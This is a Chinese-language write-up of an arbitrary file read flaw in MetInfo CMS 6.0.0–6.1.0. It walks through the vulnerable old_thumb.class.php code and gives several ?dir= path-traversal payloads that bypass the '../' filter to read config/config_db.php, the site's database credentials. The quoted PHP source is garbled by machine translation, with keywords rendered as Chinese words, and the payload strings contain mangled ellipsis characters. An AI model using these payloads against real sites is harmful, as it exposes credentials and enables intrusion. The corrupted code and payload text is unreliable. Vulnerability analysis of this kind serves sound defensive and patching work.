002-MetInfo 任意文件读取

# MetInfo 任意文件读取

### 一、漏洞简介

MetInfo是一套使用PHP和Mysql开发的内容管理系统。 MetInfo 6.0.0~6.1.0版本中的 old_thumb.class.php文件存在任意文件读取漏洞。攻击者可利用漏洞读取网站上的敏感文件

### 二、漏洞影响

* MetInfo 6.0.0
* MetInfo 6.1.0

### 三、复现过程

漏洞分析

进攻分析

看下\MetInfo6\app\system\include\module\old_thumb.class.php

“`php
<?php #MetInfo企业内容管理系统 #版权所有(C)MetInfo Co.,Ltd(http://www.metinfo.cn)。版权所有。 define('IN_MET')或 退出('No权限'); load :: sys_class('web'); class old_thumb 扩展了 网络 { 公共 功能 doshow () { 全局 $ _M; $ DIR = str_replace函数('../' ,'',$ _GET [ '目录' ]); if(strstr(str_replace($ _ M [ 'url' ] [ 'site' ],'',$ dir),'http')){ header(“ Content-type:image / jpeg”); ob_start(); readfile($ dir); ob_flush(); flush(); 死 ; } if($ _M [ 'form' ] [ 'pageset' ]){ $ path = $ dir。“&met-table = {$ _ M ['form'] ['met-table']}&met-field = {$ _ M ['form'] ['met-field']}”“; } else { $ path = $ dir; } $ image = thumb($ path,$ _ M [ 'form' ] [ 'x' ],$ _ M [ 'form' ] [ 'y' ]); if($ _M [ 'form' ] [ 'pageset' ]){ $ img = explode('?',$ image); $ img = $ img [ 0 ]; } else { $ img = $ image; } if($ img){ header(“ Content-type:image / jpeg”); ob_start(); readfile(PATH_WEB.str_replace($ _ M [ 'url' ] [ 'site' ],'',$ img)); ob_flush(); flush(); } } } #此程序是一个开放源代码系统,可用于商业用途,请自觉购买商业许可证。 #版权所有(C)MetInfo Co.,Ltd.(http://www.metinfo.cn)。版权所有。 ?>
“`

从代码中看用看到,`$dir`直接由`$_GET[‘dir’]`传递进来,并将../置空。目标是进入到第一个,如果里面的`readfile($dir);`,读取文件。看看如果语句的条件,的英文外面一个strstr函数,判断`$dir`中http字符串的首次出现位置,实质上,要进入到这个if语句里面,`$dir`中必须包含http字符串。里面的将`$dir`中包含`$_M[‘url’][‘site’]`的部分放置空,这里可以不用管。

![](/static/lingzu/images/15891628908693.png)

从上面的分析可以构造出有效负载,只要`$dir`里包含http字符串就可以进入到readfile函数从而重新读取任意函数,然后可以使用…/./来进行目录替换,因为../会被置空,所以最终payload如下

“`
?dir=…/./http/…/./config/config_db.php
?dir=…..///http/…..///config/config_db.php
?dir=http/…..///…..///config/config_db.php
?dir=http\..\..\config\config_db.php
“`

### 漏洞复现

要先找到调用old_thumb.class.php的文件,看到include/thumb.php,可以从这个文件里面进入到old_thumb.class.php

“`php

“`

所以我们通过thumb.php将构造好的`$dir`传入即可。

![](/static/lingzu/images/15891629363641.png)

可以看到成功的读取到了config/config_db.php的内容。

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容